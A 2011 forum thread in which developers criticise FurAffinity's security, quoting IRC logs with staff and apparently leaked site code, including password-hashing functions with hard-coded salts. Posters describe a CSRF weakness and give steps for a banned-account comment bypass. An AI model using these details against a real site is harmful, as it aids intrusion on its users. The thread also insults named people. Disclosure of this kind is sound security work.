# Angry Nerds, now for Android and iPhone



## Eevee (Jan 21, 2011)

Several people in that one other thread have complained that it's gone far off-topic, so here you go.

There's a lot of misinformation and misguided advice floating around, and I'd like to clear it up somewhere that's not page 20 of an announcement thread.

For starters: my motives have always been purely technological.  FA affects a lot of people I know.  It is bad from a technology standpoint, and it is dangerous from a security standpoint.  These things bother me, because my job and my hobby and much of what I do are all about building _good things_; it's not about people or politics, only about actions and technology.  My ultimate desire is to increase the number of _good things_ available to my own social circle.  I suspect the same applies to the other naysayers.


Anyway.  I have collected some logs of IRC discussions with the FA technical lead, yak.  They're broken up by date, along with a short timeline of events.
Somewhat shortened logs, with choice quotes highlighted.
Complete logs, with only botspam and side conversations removed.


The ideas I wish to drive home are:

*1. We offered to help, for free, and were turned away for political reasons.*
Oct 13:


> 14:48 < yak[away]> From what I understand I have full authority to do whatever I want with regards to development and hardware, as long as it's for the benefit of the site. read: I can get whatpever people I want on the team.


Oct 17:


> 14:46 < yak[away]> Also don't get me wrong. I know this place and the people here are a good source for many things- but it's also the same kind of people a lot of FA's administration disagrees with. I can't get anything official going otherwise I won't see the end of it :/


Oct 22:


> 15:35 < yak[away]> Xenofur: I belive openly allowing you guys to work on FA is dangerous. And not to the technical side of the site.
> 15:36 <@Eevee> so politics are keeping the site unsafe
> 15:36 < yak[away]> Discomfort, disagreement, protest. I don't want the administration to tear itself to pieces of thie issue that I would raise



This was two months before the December attack.  In that time, any of us would almost certainly have been able to find and fix the exploits used in December, _preventing_ the attack from happening at all.

I also previously worked on Ferrox for some 16 months and wrote thousands of lines of code.

*2. We helped anyway.*  Regarding CSRF, the style of exploit I used to get over a thousand watchers...
Oct 17:


> 14:16 < yak[away]> Eevee: So what do you propose? Adding one time use form tokens is kind of expensive.
> 14:16 <@Eevee> yak[away]: use session id as a token
> 14:21 < yak[away]> Eevee: Clear text session ID is kind of insecure to have in HTML that might get cached by proxies or google or whatever. Salting that with something would be better
> 14:26 <@Eevee> oh, there /is/ one problem with using session id as the token.  XSS becomes potentially worse
> ...



Oct 26/27:


> 23:29 < _fox> interested in helping me test an FA vuln?
> 23:29 <@verix> what is it
> 23:31 < _fox> ability to construct a link that makes the currently logged in user send a note to a user of my choosing, with the content of my choosing
> 23:36 < TerrorBite> Fix: check referer to only allow action if coming from the right page
> ...



To my knowledge, FA is still vulnerable to this style of exploit in at least 20 places.  Not one has been correctly fixed since the above conversations.

*3. Security is not taken seriously.*
Oct 13:


> 14:28 < yak[away]> Eevee: As far as I am concerned you people playing with something is still better then random joe average. And no, I'm going to do my best to secure whateve I'm doing; most of the time problems are in places that are adjacent to that, and that require a lot of time to properly fix. I still have my logs that I'm periodically inspecting regardless.
> 14:29 < Eevee> that's sort of the point.  you have *no idea* if joe average is fucking around, because he could be doing something insidious instead of large obnoxious hijinx
> 14:31 < yak[away]> Eevee: Yes, and what's the point? It's not like I can change something and suddenly become aware of everybody who's fucking around with the site and the details of what they're doing



Dec 17:


> 09:48 <@Pi> fwiw your userbase sees it as a triumph that you've "only" been compromised due to insecure passwords three times
> 09:49 < yak[away]> the userbase it's at all tech savvy. if whoever got admin account knew what they were doing the damage could have been ugh, slightly less then catastrophical.
> 09:50 < yak[away]> you don't have to tell me a lot of things aer shit, i know. not enough time to address everything, so baby steps
> 09:50 < yak[away]> in the direction of getting more people onboard
> ...



Security problems are something you want to find _now_ and fix _yesterday_.  Months "working on" getting people to help is not okay.

Which reminds me.  Dragoneer to Pi, in response to the MySQL password being exposed to the world:



> [14:11:57] <Dragoneer> I didn't even know the file was out there, and if I did, I sure as hell wouldn't have left it for the world.



Security issues aren't like other bugs.  You need to go find them and fix them, not wait until someone else finds them first and they become disasters.  "I didn't know" is not an excuse; at best, it should be "we missed this in our last audit and will make sure to catch similar issues in the future".  Especially when your site has a long history of security problems.

*4. Nothing is changing.*  Dragoneer protests that we're still complaining even as things are happening.  What things, where?
The "new" UI template Dragoneer re-released last Sunday was first shown in late summer 2009, and hasn't changed since then.
The Ferrox code was abandoned shortly after I left.  It's no longer available from FA.  Only Pi is hosting it.
I've yet to see any evidence of a security audit.  Even the known issues are still unfixed, months later.  Nobody has asked about my list of 30 security holes from October.
None of the galleries wiped in December have been restored.  I don't think there are backups of uploaded art, either.

Oct 16:


> 16:11 < yak[away]> Just for a closing word, I'm preparing to go into the "project manager" mode as far as FA is concerned, so I guess I'll be getting new people on and moving things forward.



This was three months ago.  Where are the new people?



This is why we say the things we say: because we've watched them unfold.  Others have been paying attention for much longer than I, and are rightfully more outraged.  verix has a sadder and angrier story of his own.

I'm not trying to "bash" FA or Dragoneer or yak or anyone.  I don't want to make people look bad.
I want the security issues fixed.  I want the PR filter to go away.  I want to hear what's actually going on technologically, not what's being "worked on" or what's planned for some nebulous time in the future.
And I want the userbase to care about these things, so I don't have to.


Please keep this thread polite and constructive, whether you agree with me or not.


----------



## Pi (Jan 21, 2011)

Some cool Sean "Preyfar/Dragoneer" Piche quotes. He will complain that I am making him look bad by reposting them.

December 21, In which he admits that he doesn't like me because I make him feel bad.


> [19:01:08] <Dragoneer> I don't always ignore you. If I can be completely honest, it's just that sometimes you come off completely abhrasive and I admit that puts me on the defensive.



In which I discuss his bizarre trust in a 13-year-old to help with security issues.


> [19:05:38] <Pi> How long have I been saying that this incident was easily preventable?
> [19:06:13] <Dragoneer> I would go back to 2005 when the first issue with FA 1.0 occured. While I wasn't an admin then, I recall you being there saying the same things under the Jheryn/Alkora reign.
> [19:06:53] <Pi> so when henri watson was 8 years old, i was here trying to get these problems fixed
> [19:07:03] <Pi> i'm going to let you think about that for a minute
> [19:07:22] <Dragoneer> Yeah. That... that... says a lot on its own, really.



January 5, In which I describe his lies about Eevee.


> [15:40:41] <Dragoneer> What I wanted was for FA to be re-coded in, as is, with all the features and intended features working (filters, search, etc.). But, I'm not a coder, and at the time Eevee was on staff, I didn't know the best way to direct him, talk to him or engage him in it.
> [15:44:26] <Pi> surprise, your lack of leadership killed the project
> [15:46:55] <Pi> but you showboat it as "the lead coder was difficult!!!"



He has yet to retract his flat-out lie in the other thread.

And this is out of temporal sequence, but I think this is the most damning thing he's said.


> [15:28:53] <Dragoneer> I never wanted to be in the role that I was. Over time, things changed, and I was pushed into it. I never wanted to be head admin, but nobody else stepped up. I can't stay I'm perfect. I never said that.



You never wanted to be "lead admin"? You also don't want to pass the ball to someone who has skill? Then fine. We'll take it from you.


----------



## verix (Jan 22, 2011)

Sorry for not showing up for as long as I did in this thread. I've finally calmed down after watching a bunch of movies and trying to play games and hammered out a plan to fix the website: (edit: there was a plan here, but it's no longer relevant-- there's more stuff going on, hopefully that'll be clear in a few days)

I realize it's really not fair for me to get all emotional without something to throw down on the fire, so here's a vague plan to get us started.


----------



## Taralack (Jan 22, 2011)

verix said:


> so here's a vague plan to get us started.


 
inb4 Dragoneer/yak declines your help again


----------



## verix (Jan 23, 2011)

Toraneko said:


> inb4 Dragoneer/yak declines your help again


While I know I'm not the only one frustrated at this whole situation, please don't resort to stuff like this. If I can get over my scorn at what's currently surfaced we can all just set aside our collective frustrations and try to get stuff done.

Honestly, the hold-back has been coming from both sides-- we're angry and yelling because we feel they don't want to listen and they don't want to listen to angry and yelling. So it's only fair that we all just calm the fuck down and get this site going the way it should be going. While I still feel I'm justified in my anger and frustration, the time for that has really past and is overall not constructive in the least. We should all settle down and have an objective discussion on what needs to be done, and I thank Eevee for having the foresight to get this pushed in the right direction with the right tone.


----------



## Armaetus (Jan 23, 2011)

I would love to see something actually get _done right_ with this site and not pussyfoot around until it's too late and exploited to the max.


----------



## verix (Jan 23, 2011)

I've started to perform the reverse-engineering process to get it out of the way early. I figured it'd be a fun exercise for everyone to watch how it happens by taking my notes live as I try and dissect the site to see how it's supposed to work. http://www.furaffinity.net/journal/2043244/

edit: Doing live-editing on FA kinda sucks. Here's a Google docs link instead: https://docs.google.com/document/d/...RhoSmhagX9qCn3amc/edit?hl=en&authkey=CNv_j9sN


----------



## Pi (Jan 24, 2011)

Hi. I wrote this gigantic thing on LJ based entirely on two of the _comments_ in the FA templating engine, the thing that's responsible for taking the database content and creating the HTML page to display it.

Over on Viv, I also posted a network diagram that I reverse-engineered out of the portscan results. Any takers?


----------



## Kihari (Jan 25, 2011)

Random person following these terribly interesting events. So, I really want to ask,
	
	



```
addslashes(stripslashes(stripslashes($value)))
```
For the past few days now, I've been wondering exactly _what_ this is stripping slashes from, and why it's doing it twice, only to (presumably) put them back again. stripslashes() doesn't work properly, but magically does its job when called twice? All this to make sure things are appearing only in the proper place? Perhaps someone could be kind enough to enlighten me.

Also, morbid curiosity,

```
if(is_numeric($value) == TRUE)
```
Author thinks it's easier to read a bool-to-bool comparison, or... what?
	
	



```
$keyword
```
Some global variable?


----------



## Pi (Jan 25, 2011)

Kihari said:


> ```
> addslashes(stripslashes(stripslashes($value)))
> ```


I dunno. But I do have this conversation from 2003, before I even got into this whole furry thing.

```
<lysol> hmm
<lysol> I think I was coding high
<lysol>  addslashes(stripslashes($title))
```
At least you know what this guy is adding and stripping the slashes _from_.



Kihari said:


> For the past few days now, I've been wondering exactly _what_ this is stripping slashes from, and why it's doing it twice, only to (presumably) put them back again.


Well, without seeing the rest, your guess is just as good as mine. I only have the headers that they left lying around along with their database password.


Kihari said:


> stripslashes() doesn't work properly, but magically does its job when called twice? All this to make sure things are appearing only in the proper place? Perhaps someone could be kind enough to enlighten me.


See, when you start talking about how these particular built-in PHP functions actually behave _in reality_, instead of just by reading the function name, I have to start asking you a whole bunch of stupid questions before I can answer *your* question, mostly relating to idiotic configuration variables that automatically call addslashes and stripslashes \\"for you\\" , that people fuck with because they hear it \"fixes\" security problems, and has the minor side effect of "only" screwing up your data'"'"'"'&amp;.



Kihari said:


> Also, morbid curiosity,
> 
> ```
> if(is_numeric($value) == TRUE)
> ...


I don't really want to talk about those particular lines of code and why they were written and how that's bad, because then I will veer off into a discussion of PHP's type system and its vagaries across minor releases, and then we'll end up talking about how PHP's garbage collector had this totally hilarious bug where...

I think you get the point. The whole thing is just fractally wrong. It's a testament to wrongheaded thinking at every. single. level, and that extends all the way across the furry boundary into the minds of the people who _develop the fucking language the website is written in_.

Finally:
$keyword isn't defined in any of the headers. Since I think they turn error reporting off (and if they do, i can pretty much guarantee you that their excuse would be "for performance reasons") it's _entirely possible_ that the site is constantly spewing them, and they're just getting ignored.


----------



## LizardKing (Jan 25, 2011)

I never really understood this problem with "politics". It's clear that you guys are fully aware of the problems, and could exploit them (or publish them) as much as you wanted at any time, should you desire. Yet being given access to fix this is somehow a greater security risk? I'm pretty sure you guys don't need root access or anything, so what's the big deal? Oh gosh, you might sneak in some code that might give you elevated access. As opposed to leaving it as is _and still being able to do it anyway._

Perhaps there is something I'm missing, but I just can't see the sense in it.


----------



## Aden (Jan 25, 2011)

LizardKing said:


> Oh gosh, you might sneak in some code that might give you elevated access. As opposed to leaving it as is _and still being able to do it anyway._


 
I never understood why this would be a concern, even. As if they're just going to slap whatever they write online without vetting it first.


----------



## Kihari (Jan 25, 2011)

Pi said:


> I don't really want to talk about those particular lines of code and why they were written and how that's bad, because then I will veer off into a discussion of PHP's type system and its vagaries across minor releases


 
I'll take your word that it's a Bad Thing, and we can simply leave it where it is, then.

In any case, thank you for entertaining my questions. I feel that much more caught up with the rest of the class, as it were.


----------



## Pi (Jan 25, 2011)

Aden said:


> I never understood why this would be a concern, even. As if they're just going to slap whatever they write online without vetting it first.


 
Except that is clearly what happened with the comment hiding code, and that incident happened while yak was sitting on the same IRC channel as the rest of us.

This is, however, a technical thread. To balance out the political derailment, here's an explanation of why I think the art storage is fundamentally broken.

Submissions are stored in some folder. Let's call it "/art". Underneath "/art" is a bunch of folders per user, and underneath "/art/$user/" are all the submissions:

```
/art/aden/
/art/aden/ass.jpg
/art/eevee/
/art/eevee/cock.jpg
/art/pi/
/art/pi/pants.jpg
/art/verix/
/art/verix/tits.jpg
```
Fine. This works up to a point. When you ask for "/art/verix/tits.jpg", the computer can go read through every single entry in "/art" very quickly to find "/art/verix" and then "/art/verix/tits.jpg".

When you get to around 32,768 folders under /art, the computer starts to spend more time reading everything under /art, and then even more time digging through it entry by entry.

From what Yak mentioned in #hackerfurs, the site has reached this point. *12 times.*


> ```
> <&yak[work]> It's being rewritten, but to a similar hierarchy. FA's data storage is pretty much a flat /art directory with a bajillion of directories with user account names. I guess alkora initially didn't plan for more then 32k users or, which is more belivable, didn't know about filesystem limitations.
> <&yak[work]> So at this point I have like 12 /art directories with symlinks from 11 of them back in /art
> <&yak[work]> and every once in a while I have to add a new one
> ```


The nice thing about UNIX is that it's kind of a universal language among geeks. If yak is describing this accurately, he's making it look something like this, with "->" representing a symlink (unix-speak for 'shortcut') from the folder on the left to the one on the right:

```
/art1/aden/
/art1/aden/ass.jpg
/art2/eevee/
/art2/eevee/cock.jpg
/art3/pi/
/art3/pi/pants.jpg
/art4/verix/
/art4/verix/tits.jpg
/art/aden/ -> /art1/aden/
/art/eevee/ -> /art2/eevee/
/art/pi/ -> /art3/pi/
/art/verix/ -> /art4/verix/
```
Yak talks about how Alkora didn't know about filesystem limitations, while going on to describe something that not only doesn't fix the original problem, it *makes the situation worse*. When you admit to doing this *12 times*, I really have to question your grasp of the details.

Just for reference, I know three or four different ways to solve this problem, right off the top of my head.


----------



## Eevee (Jan 25, 2011)

Aden said:


> I never understood why this would be a concern, even. As if they're just going to slap whatever they write online without vetting it first.


My log trimmings contain several suggestions to yak of how to approach third-party contributions.

To summarize yak: "I'm in charge of all tech stuff and you guys know your stuff, but if I let you help then everyone else would freak out."
To summarize Dragoneer: "yak's in charge of all tech stuff and you guys know your stuff, so it's his decision.  Also, no."


----------



## Eevee (Jan 25, 2011)

Pi said:


> The nice thing about UNIX is that it's kind of a universal language among geeks. If yak is describing this accurately, he's making it look something like this, with "->" representing a symlink (unix-speak for 'shortcut') from the folder on the left to the one on the right:


I think I had a look when I was on Ferrox, and yes, this is accurate.

The actual problem for non-UNIX-fluents is that, on the most common filesystem, a directory can only have 31,998 subdirectories for an obscure technical reason.  But links aren't really subdirectories, so they don't count against that limit, and so yak has just moved all the existing art to another directory and replaced all those subdirectories with links.  Twelve times.

Also, to the best of my knowledge, those files are all being served off a single machine's RAID10 array, and there are no backups.


----------



## Aden (Jan 25, 2011)

So what's wrong with:

/art/a/aden/dicks.ppt
/art/z/zaush/fuckallyall.gif

Or even more specific than that:

/art/aa-to-ag/aden/moreDicks.ppt

I mean it won't "solve" it in the really long run, but it's something, right?

\Not a programmer


----------



## LizardKing (Jan 25, 2011)

Aden said:


> So what's wrong with:
> 
> /art/a/aden/dicks.ppt
> /art/z/zaush/fuckallyall.gif
> ...


 
I'm betting something dumb like all the paths are hard-coded to /art/$user/ and it's never been changed.

@Pi, Eevee's post doesn't appear to indicate this is a "technical thread", and indeed his first point is to illustrate politics, so I'm not sure where that came from.


----------



## Bobskunk (Jan 25, 2011)

Did they yank the Six Years of FA thread


----------



## Pi (Jan 25, 2011)

Eevee said:


> But links aren't really subdirectories, so they don't count against that limit, and so yak has just moved all the existing art to another directory and replaced all those subdirectories with links.  Twelve times.


And then the administration patches around the problem by wasting _donator money_ on a machine with an _insane_ amount of RAM, so it can keep the gigantic /art directory in memory.

But that's a political problem, not a technical one.

For my next act of penance (derailing this thread with politics again), I will describe how I think the scheme they're using to "protect" your passwords is fucked. This concerns two functions, cleaned up slightly from the state in which I found them:

```
function _encrypt($string) {
    $first = crypt($string, '$2a$07$'.sha1('d67c5cbf5b01c9f91932e3b8def5e5f8').'$');
    $final = sha1($first);
    return $final;
}

// Part of the newer authentication system
function _password_hash($password, $salt) {
    $static_salt = md5('g>m$`w6;8+BL/(p7`dvn+$n2mtjU7}3`');
    return hash('whirlpool', $salt.md5($password).$static_salt);
}
```
_encrypt uses bad (meaningless) variable names, doesn't actually do what the function says (there is no _decrypt, nor can there be; it should be called "_hash". (actually, it shouldn't be written at all, but that's a different story)), repeatedly computes the sha1 of a constant string. Also, the constant string is the md5sum of the word "teststring".

It also bears all the indications of having listened to Jeff Atwood (who is a fucking buffoon because he talks like this, and damages things because people listen) regarding how to salt passwords. A constant string, such as that used in _encrypt, is _not salt_. The practical upshot is that _encrypt provides no protection against dictionary attacks â€“ in the event that the database gets leaked, any "old style" password would be easier to crack. (more details on this topic are available here)

Worse than all of that, someone unfamiliar or less-familiar with security will look at _encrypt and see the _illusion_ that it is secure because it uses salt and sha1 and crypt and sha1 and lots of magical-looking hex digits.

_password_hash, to its credit, avoids the salting problem... while also creating new ones. It is arguably worse than _encrypt. Instead of using the same password-hashing function that the security-conscious OpenBSD folks use (believe it or not, that is what "$2a$07$" means), it uses the relatively unknown whirlpool hash on salted-and-md5-keyed md5.

I'm sure yak would excuse this as "it works well enough". It's how he fixes things: in order to give the appearance of having fixed something, he will solve 98% of the problem. The lesson that hasn't been learned here over the past 6 years is that, where security is concerned, that 2% *will fuck you*, every time.

For what it's worth, I'm not smart enough to design, from first principles, a secure modern password system.

Unlike the various authors of code like this (this is not a problem restricted solely to FA, believe me), I _am_ smart enough _not to_. Someone else has designed something that works better and solves 100% of the problem.


----------



## Eevee (Jan 25, 2011)

LizardKing said:


> I'm betting something dumb like all the paths are hard-coded to /art/$user/ and it's never been changed.


Correct, and in fact the /a/b/c/abc approach is a fairly common way to mitigate this problem.  There's not really any good reason _not_ to have done it, except that it would take :effort: to shuffle all the directories around.



LizardKing said:


> @Pi, Eevee's post doesn't appear to indicate this is a "technical thread", and indeed his first point is to illustrate politics, so I'm not sure where that came from.


Well, politics around technical issues.  Tech is far more interesting to me, anyway.


In the interest of keeping the content train a-rollin', here's an explanation of one of the exploits I found that has now been fixed.

It was possible to post comments on a journal from a banned account, as follows:
1. Log in with a not-banned account.
2. Visit the journal or comment you want to reply to, and write your reply.
3. Switch to another tab.  Log out, and log in as the banned account
4. Go back to the first tab and click 'Reply'.
(You could also just manually submit to the "post a comment" URL without needing a secondary account, but this explains the idea a little better.)

The issue is actually kind of endemic to how a lot of PHP "apps" work.  Because PHP runs as a collection of independent scripts, rather than a cohesive application, there's no single entry point.  If you have a separate file for every page, like FA and vBulletin and phpBB and tons of other software, then every single one of those files needs to do general access checks at the top of every file.  (Contrast this to most structured frameworks, where you can put this stuff in one place, and it _necessarily_ applies to your entire site.)

In FA, the check for banned-ness is contained within "system/header.sys", the file that renders the page header: your username, the number of unread things, the logout link, etc.  If you're banned, this file will print a message and immediately abort.  Seems totally reasonable, since everything needs to include this file.

_Except_ that commenting is controlled by a script that never actually shows a page; it only ever posts comments, then redirects somewhere else.  So this script had no reason to import system/header.sys, and didn't.  Thus it never did the banned-ness check.  Whoops.

I mentioned this in my list, but it wasn't fixed until I posted a single comment on one of my girlfriend's journals, at least a month later.


----------



## verix (Jan 25, 2011)

Aden said:


> So what's wrong with:
> 
> /art/a/aden/dicks.ppt
> /art/z/zaush/fuckallyall.gif
> ...


 
Actually, you're sort of describing the solution to this problem. You may have seen it on one of your favorite danbooru-style porn-dumps. Hell, even 4chan, I think. 

You may or may not be familiar with a thing called a "hash." A hash is a unique string that represents a specific, unique set of data. The bottom-line of a hash algorithm is to take a set of data and produce a unique string out of it. So a lot of websites-- such as danbooru-style image boards-- create a SHA1 sum of the content of the image and rename the picture to that to stick in their data hierarchy. That's probably why you have a lot of weird strings of long numbers and letters in your porn folder-- it's an ubiquitous technique.

Let's say you have a JPEG picture with the SHA1 sum b8473b86d4c2072ca9b08bd28e373e8253e865c4. You start with a series of folders like this:


```
$ ls ./content/
0  1  2  3  4  5  6  7  8  9  a  b  c  d  e  f
```

Since the first letter of our image is "b", we stick it in the "b" folder, which looks like this:


```
$ ls ./content/b/
0  1  2  3  4  5  6  7  8  9  a  b  c  d  e  f
```

Since the second letter of our image is "8", we stick it in the "8" folder, and thus our first picture is born!


```
$ ls ./content/b/8/
b8473b86d4c2072ca9b08bd28e373e8253e865c4
```

Git apparently just says "fuck it" to the subfolder-subfolder thing and does something like this:


```
$ ls ./lol-linus
b8
$ ls ./lol-linus/b8
473b86d4c2072ca9b08bd28e373e8253e865c4
```

You can do the same for storing user content, from /art/a/d/aden to /art/z/a/zaush. Mathematically, this winds up creating only 1296 potential subfolders (not including sub-content of users) and properly organizes everything into a hierarchical tree that makes listing directories that much faster. The worst case scenario is to have every subdirectory filled with 31,998 users, which would mean that on your site you'd have *41,469,408* being a bunch of assholes to your filesystem! That's more than the population of California!

With the current structure-- assuming there are only twelve subdirectories of users-- it would take 383,976 users to cause strain to the filesystem. Therefore, this subdirectory style is probably the most optimal way to go to prevent future problems from happening too fast.


----------



## nrr (Jan 25, 2011)

Bobskunk said:


> Did they yank the Six Years of FA thread


 
It does appear that way, doesn't it?

Say, guys, what's the story?


----------



## Pi (Jan 25, 2011)

Bobskunk said:


> Did they yank the Six Years of FA thread


 
They appear to have done just that. Go ahead, sweep that particular skeleton under the rug, guys.

Moving right along:
Over-reliance on global variables:

```
if($_USER['seeadultart'] == 0 or $birthday > $cutyear or $_USER['maturelocked'] == '1') {
    $_GLOBAL['adultartwork'] = ' AND adultsubmission=0';
    $_GLOBAL['lockart']      = TRUE;
}
else {
    $_GLOBAL['adultartwork'] = '';
    $_GLOBAL['lockart']      = FALSE;
}
```
Look at how much duplication is going on here.

We already know from the already-global $_USER property whether or not a user can see the porn. This code goes on to make, to my count, a total of 4 ways to express _the same thing_. Since it's global, there is no guarantee that the rest of the program will use any one of them, and in fact the way it is written _guarantees_ that different parts of the code _have_ to keep all four up to date.
* The user control panel is probably the one that toggles seeadultart
* maturelocked is an admin-only property
* The SQL query relies on adultartwork. Seriously, conditionalizing SQL by fucking with global variables? What?
* lockart is absolutely redundant

We call this kind of shit "maintenance overhead". Normal programmers try to reduce this as much as possible.

Normal people also don't hide their problems by shooting the messenger.

Again, I have a couple of solutions for this particular problem in mind.


----------



## Eevee (Jan 25, 2011)

Pi said:


> Over-reliance on global variables:


That's not the half of it.  Here are some choice snippets from system/header.sys and system/main.sys, files that were both publicly available from FA itself until very recently.


```
if($_USER['accesslevel'] == 4 or $_USER['accesslevel'] == 5 or ($_USER['suspended'] and $_USER['accesslevel'] != 1))
//if($_USER['accesslevel'] == 4 or $_USER['suspended'])
{
	if($file != 'logout.asp')
```
If the user is banned (4?) or suspended (5?), _or_ if the user isn't suspended but still has an active suspension and hasn't had his/her role updated for some reason.  Also there's some old code commented out, just in case source control breaks?



```
// Decide what header to show
switch($config['System_Mode'])
{
	// ... several cases elided
	case '5':
		//if($file != 'administration.asp')
		//{
			@readfile('fa_offline.html');
			exit();
		//}
		break;
```
There are several fascinating things here.  The starkest is that, for some reason, FA is apparently taken "offline" by updating a configuration file to change the system mode to 5 (?!).  Then every request goes _through the application_, which reads and spits out a static file.

This is massively inefficient and potentially dangerous.  I can't speak to whether this functionality is used in practice, as it might just be done at the server level, but it's astounding that this was implemented in the first place.  And this isn't in the code dump from 2007, so it's actually relatively _new_.

But I quoted this in the first place to point out that $file is checked in both of these snippets -- I assume it's not any more in the latter because someone was exploiting the admin panel while the site was "offline".  So functionality of shared code is different depending on _what code includes it_.  This is one of the grossest things you can do.

To yak's credit, there used to be quite a bit more of this.  From the old code:

```
if($file == "settings.asp") eval ("\$_GLOBAL[jscript] = \"".tpl("settings-jscript")."\";");
if($file == "submit.asp") eval ("\$_GLOBAL[jscript] = \"".tpl("avatar-clickimage")."\";");
```
What?



```
error_reporting(E_ALL);
if($_USER['userid'] == '7978')
{
	ini_set('display_errors', 1);
}
```
Three places in shared code do something special for yak's user id.  One place does something special for net-cat's user id.  I don't know why the user system wasn't ripped out and replaced with roles ages ago; it wouldn't be that difficult.






And some bonus commentary that has nothing to do with globals:

```
$mysymbol = usersymbol($_USER['accesslevel']);

$_USER['suspended']
and
$mysymbol = '!';  // Suspended
```
Rather than update the usersymbol() function, there's a special case added to the code that _calls_ it.



```
//  Near-RFC quality and conformance email validation function  (yeah right)
function validate_email($email)
```


```
*   Unique userID generator
 *
 *   RFC4122, http://www.ietf.org/rfc/rfc4122.txt
 *
 *   Snip from the specification
 * ...elided
```
I'm fairly certain that there's existing PHP code to accomplish both of these tasks.  I don't know why it was hand-written from scratch, or why 70 lines of specification needs to accompany 7 lines of code when the spec is already linked.


system/resourses.sys contains various constants:

```
//// Watch types
define('WATCHTYPE_SUBMISSIONS', 1);
define('WATCHTYPE_JOURNALS'   , 2);
```
...and yet there are none for, say, the access levels or system modes or check() modes.  That would easily improve the readability of this codebase by a significant margin.



```
////  Parse the supplied text for any kind of hyperlinks and "linkify" them
function parse_links(&$text, $is_admin=FALSE, $parse_video=FALSE, $embed_video=FALSE)
{
  // ...
  $replaces[] = 'stripslashes(\'<a class="auto_link" href="\'.preg_replace(\'/j\s*a\s*v\s*a\s*s\s*c\s*r\s*i\s*p\s*t\s*:/i\', \'\', \'$1\').\'">\'.htmlentities(\'$2\').\'</a>\')';
  $replaces[] = 'stripslashes(shorten_url(preg_replace(\'/j\s*a\s*v\s*a\s*s\s*c\s*r\s*i\s*p\s*t\s*:/i\', \'\', \'$1\'), \'$1\'))';
```
This appears to be an evaluated regex replacement that contains both stripslashes() and enough backslashes to make the actual content come out right in the end.  I give up.


----------



## Pi (Jan 25, 2011)

Next problem: the app silently truncates data. I just posted a shout on the mainsite. The shout box says it has room for 222 characters, but that isn't enforced in the HTML, only in the JavaScript. Since I'm not running in a  JavaScript capable browser right now, it let me post more than 222 characters.

Instead of running up against a database length limit and being offered the chance to correct my shout and not look like a tool for the sin of running without javascript, it just ate the extras.

The web is a _data-driven world_. Throwing data out because you don't know what to do with it shows a cavalier attitude towards the entire process. Granted, this is in a stupid feature like shouts, but the attitude is thoroughly entrenched in the code.


----------



## Eevee (Jan 25, 2011)

The attitude is thoroughly entrenched in the _database_, really.  MySQL just completely blows, and it's hard to make it un-blow once you're using it.

Not that FA is a shining example of data validation, mind you, but the particular issue of truncation is a more fundamental problem than shoddy app code.  A better (though more subtle) complaint is that FA is using InnoDB for its tables but, to my knowledge, doesn't use transactions and has _zero foreign keys_.


For the non-nerd crowd, foreign keys mean something like this.  Say you have a table of users, called *users*, and a table of artwork, called *submissions*.  *users* will generally have a primary key column (a unique numeric identifier), called something like *users.id*.  Now, each submission obviously belongs to a single user, so you'll have a column in that table called *submissions.user_id* that's supposed to point to the owning user.

(An aside: one of FA's most embarrassing problems for the longest time was that it didn't use this setup at all.  Instead, the owner's _username_ was stored in other tables.  This makes database access slower, makes renaming accounts nearly impossible, makes your database consume more space needlessly, and is just a terrible idea all around.  Luckily, this is no longer the case.)

Anyway, you can specifically tell a good database that you have this setup, by defining *submissions.user_id* to be a _foreign key_ that points to *users.id*.  It's the key from the *users* table, but it's in a foreign table.  This way, the database will complain loudly at you if you try to do something bogus, like add data to *submissions.user_id* that doesn't actually refer to an existing user, or delete a user who still has submissions.  And FA doesn't do this.

This is actually the same reason there are "X was deleted" notices in your inbox; when a comment/shout/submission/whatever is deleted, the notification is left lying around not pointing to anything.  So all those ghost notifications are actually garbage data, smoothed over somewhat by the application.


----------



## LizardKing (Jan 25, 2011)

Pi said:


> ...    $_GLOBAL['adultartwork'] = ' AND adultsubmission=0';...



Not that I've done a great deal (read: any) real programming of this variety, but sticking raw SQL into a global like that seems like something I'd see on thedailywtf.com. Augh.



Eevee said:


> define('WATCHTYPE_SUBMISSIONS', 1);
> define('WATCHTYPE_JOURNALS'   , 2);



Any idea how long that's been there? I'm pretty sure the ability to have separate watches for submissions and journals has been requested for a long time, yet never appears to have been implemented (unless it was removed before I joined).



Eevee said:


> ...A better (though more subtle) complaint is that FA is using InnoDB for its tables but, to my knowledge, doesn't use transactions and has _zero foreign keys_...This way, the database will complain loudly at you if you try to do something bogus...



Maybe that's why InnoDB was chosen :V


----------



## Eevee (Jan 25, 2011)

LizardKing said:


> Any idea how long that's been there? I'm pretty sure the ability to have separate watches for submissions and journals has been requested for a long time, yet never appears to have been implemented (unless it was removed before I joined).


Oh, right, I forgot it's not actually implemented.  Those constants have been there for at least three years.



LizardKing said:


> Maybe that's why InnoDB was chosen :V


InnoDB is actually the MySQL engine that _supports_ foreign keys.  The default, MyISAM, doesn't.  You'd have to go out of your way to use InnoDB, and its primary advantages are the two things FA isn't using.


----------



## LizardKing (Jan 25, 2011)

Eevee said:


> InnoDB is actually the MySQL engine that _supports_ foreign keys.  The default, MyISAM, doesn't.  You'd have to go out of your way to use InnoDB, and its primary advantages are the two things FA isn't using.


 
I'm assuming the second advantage is transactions as you mentioned previously, though I lack the technical expertise to think of any valid reason as to why you'd not want to enable that.


----------



## Pi (Jan 25, 2011)

LizardKing said:


> I'm assuming the second advantage is transactions as you mentioned previously, though I lack the technical expertise to think of any valid reason as to why you'd not want to enable that.


Turning on InnoDB enables support for transactions and foreign keys. The app doesn't *use* them.

It's like someone heard "innodb is good because it does things!" and turned it on without actually understanding what it *means* or how to use it properly.

Sort of like how they have a big expensive cisco router and switch sitting on two backbones, but the only thing hanging off of the secondary network backbone is the server consoles.

Properly configured, FA could survive some Internet downtime. Currently? If one backbone fails, the site is either gone, or the admins are locked out of the hardware's remote-access controller. Not to mention that they aren't using the router for anything other than forwarding IP; Cisco equipment has some nice ACLs that would provide another layer of network security.

...hey, I could fix this, too! In fact, I offered; yak declined:

```
<@Pi> how about you give me access to your fucking router
<@Pi> and i put in a firewall
<@Pi> and then i will shut the fuck up about your production credentials and your fucked template system and your buck-passing fucking shit for at least 24 hours
```

But not even the offer from me to shut up was accepted. End result? I'm sitting here talking about their production credentials, fucked template system, appalling network security stance, bad database layout, and assbackwards technical decisions. Oh, yeah, and their buck-passing fucking shit:

```
<yak[away]> we're working on redoing FA's entire networking. what is there now is legacy setup that evolved from a two server network
```

